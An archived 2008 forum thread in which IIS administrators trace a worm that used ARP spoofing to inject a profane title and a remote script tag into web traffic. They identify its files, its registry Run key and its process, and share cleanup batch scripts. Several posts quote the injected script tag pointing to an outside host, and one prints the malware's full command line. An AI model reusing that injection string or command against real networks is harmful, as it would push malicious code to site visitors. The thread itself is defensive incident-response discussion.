Solved

IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere

Posted on 2008-06-22
36
1,576 Views
Last Modified: 2008-06-28
Hi, my web servers all iss, have been compromized, we are not sure how although we think it may have been sql injection. the follwoing

Fuck Th3 W0rld!" and it is injected into the source code of every Java enabled Website.  We cannot clean nor find the source of the spreading.  Here is the Java Source:  <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

i have run spyware scans, virus scans, and cannot determine where the infection is coming from
and i have had to stop my web servers, does anybody have any clue

this is an emergency
0
Comment
Question by:blueswitch
  • 13
  • 11
  • 4
  • +4
36 Comments
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21839976
I'm sure you've done this already, but...

First off, turn off access to your site, noone is going to thank you for screwing up their system.
0
 

Author Comment

by:blueswitch
ID: 21839980
that has already been done, now im trying anything and anything to find the infection
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21839992
Your website has an SQL engine embedded in it?  If so, check that parameters sent to the engine are properly validated.  As I understand it SQL injection is about putting formatting characters into a form.  The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain.  So what you've got to do is to strip out all characters that could setup such a command.
0
 

Author Comment

by:blueswitch
ID: 21839994
our problem is that the hack has already happened iis has been compromised
the database and code are ok,

when i move the database and code to a clean server, the site is normal again
so my only conclusion is that the server has somehow been modified, howwver i cant find it
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840000
Have you checked things like Stored Procedures?
0
 

Author Comment

by:blueswitch
ID: 21840006
no,

but as i mentioned i have physically moved all databse files, as well as the web code to a prviously uninfected machine, and the infection does not follow
also it affects asp pages not using databases, so i have dteremined that it is infecting iis
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840018
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable?  Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840022
0
 

Author Comment

by:blueswitch
ID: 21840023
agreed, but for now we nee dto be able to ge tthe sites back up
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840029
not a pleasant Sunday for you...
0
 

Author Comment

by:blueswitch
ID: 21840034
not at all
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840054
0
 

Author Comment

by:blueswitch
ID: 21840062
interesting

here i think its a variant of those attacks where they managed to get the iis server infected
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840063
0
 

Author Comment

by:blueswitch
ID: 21840073
these are very interesting but  the problem is i have a new variant, and my iis is infected.
im really at a standstill
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840077
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time.  If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
0
 
LVL 1

Accepted Solution

by:
adds21 earned 500 total points
ID: 21840134
Okay.  We've now fixed out problem.

Firstly, it would appear there is nothing running on the webservers themselves.  It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).  

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey in, and sure enough it was running an unknown process at user login - I'm sorry, I can't remember what the process was called (just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840166
Good news indeed.  The SQL coding needs to be reviewed for vulnerabilities, as mentioned.

You shouldn't be running two accounts on EE.  I suggest you do something about that too!
0
How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

 

Expert Comment

by:stephenevans
ID: 21840241
Long night indeed, thanks adds21, your post pointed me in the right direction. if you find more information please do post it.  Im backup and running but not sure how, with all the things i tried im not sure what one sorted the issue.
0
 

Author Comment

by:blueswitch
ID: 21840406
ads 21
what did you find if its on the sql server what was the proces called

what do i look for

0
 

Author Comment

by:blueswitch
ID: 21840409
i just restarted my sql server , didnt seem to have effect, i didnt see any process
0
 
LVL 31

Expert Comment

by:moorhouselondon
ID: 21840458
Blueswitch:-

Are you doing this on the new, uninfected machine, or the infected one?  
0
 

Author Comment

by:blueswitch
ID: 21840469
on the infected one, i have many web and sql servers, here swhat i have found out so far

1. the infection has some type of logic, as it will not show the profanity in the title  if the ip of the computer browsing the site is on the same subnet as the machine infected

meaning, all local machines on my network do not see the profanity ann all the sites.
this has been verified, by using a load balancer which maskes the user ip wand make sit appear as an internal user., and when i placed an infected machine behind the load balancer the outside world did not see the profanity

2. i think its on the web server and iis not sql, as when i used a clean iis machine, (that has sql installed)
and used that, whil etrasfering the entire dtaabse folder, inluding the master msdb etc, to the is machine from an infected machine, the problem went away

0
 

Author Comment

by:blueswitch
ID: 21840649
one more thing it only affects port 80
so if the site is under ssl the hack does not take affect
has anybody else been affected
0
 

Author Comment

by:blueswitch
ID: 21841357
ok

the problem has been resolved,  the problem is on the sql server as posted above. its an arp attack
a sql injection attack installs an executable on one of teh sql servers
that sql server becomes a psudo gateway intercepting all web traffic and appending the code above

it does not modify sql or iis ain any way


0
 

Author Comment

by:blueswitch
ID: 21841912
additionally, while it may apear many machines are infected, only one is infected, ( a sql server)
and it has some program running that sintercepting the arp traffic and causing all teh problems

isaac
0
 

Expert Comment

by:stephenevans
ID: 21854270
As an update, i've been unable to find the source of the SQL Injection but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm i found files relating to the following,

http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html

wpcap.dll and the ohher files can indeed enable an uploaded files to access the network card at the network level and hence mess with ARP and other traffic.

Stephen
0
 

Expert Comment

by:RandyMontgomery
ID: 21867599
blueswitch,

What is the name of the exe.  I still can not find it on any of my servers.
0
 

Expert Comment

by:stephenevans
ID: 21870124
The EXE was called wapsrv.exe it had a created date of the 21st, the full list of files that were created are as follows.  

System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
0
 

Expert Comment

by:RTPIT
ID: 21870222
Thank you stephenevans!   Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
0
 

Expert Comment

by:RTPIT
ID: 21872098
I found the culprit I made 2 scripts one for 2000 and one for XP/Server

2000.bat
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one process svhost.exe process run by the local user account, it's switch was:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
0
 

Expert Comment

by:RTPIT
ID: 21872270
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0
 

Expert Comment

by:RandyMontgomery
ID: 21881348
First of all thank you all for your input.

I checked every server on my network and none of the following files "packet.dll,wanpacket.dll,wapsrv.exe,wpcap.dll,npf.sys and waptimes.exe" were found on my servers.  Also checked my process's using ProcessExplorer on each server and did not find anything abnormal.  The virus seems to come and go and when it's active is severally slows down the internet and LAN/WAN traffic.  I even tried wireshark to find the misc traffic from each server.  Symantec stops the VIP.js and its other names on the workstations.  Any of your admin's running Symantec end point protection on your network?  Any other comments, ideas, thoughts to radiate this bug?
0
 

Expert Comment

by:RTPIT
ID: 21891675
It doesn't have to be a server, the machine that we ended up finding it running on was a XP client PC.

If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router.  Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
0
 

Expert Comment

by:RandyMontgomery
ID: 21896818
I was under the impression that it was a server virus, thanks for information.  What anti-virus software are you running on the workstations?
0
 
LVL 23

Expert Comment

by:Admin3k
ID: 21929837
For the sake of Google & Search engines

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99


this is the original Culprit, a Low profile worm that injects malicious HTML code into local HTTP traffic, using ARP poisoning attacks , the IFrames injected differ, but the payload is usually executing  JS / VBS trojan downloaders , Mcafee detects it as Trojan VBS/ PSYME , Kaspersky detects it as Trojan-Downloader.JS.Multi.cn
upon execution this will download further Malwarem, some of them were extremely difficult to remove.

I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands on cleanup, once cleaned, other users who experienced the VBS/PSYME message
0

Featured Post

What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

Join & Write a Comment

If you get continual lockouts after changing your Active Directory password, there are several possible reasons.  Two of the most common are using other devices to access your email and stored passwords in the credential manager of windows.
It’s a strangely common occurrence that when you send someone their login details for a system, they can’t get in. This article will help you understand why it happens, and what you can do about it.
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
You have products, that come in variants and want to set different prices for them? Watch this micro tutorial that describes how to configure prices for Magento super attributes. Assigning simple products to configurable: We assigned simple products…

758 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

22 Experts available now in Live!

Get 1:1 Help Now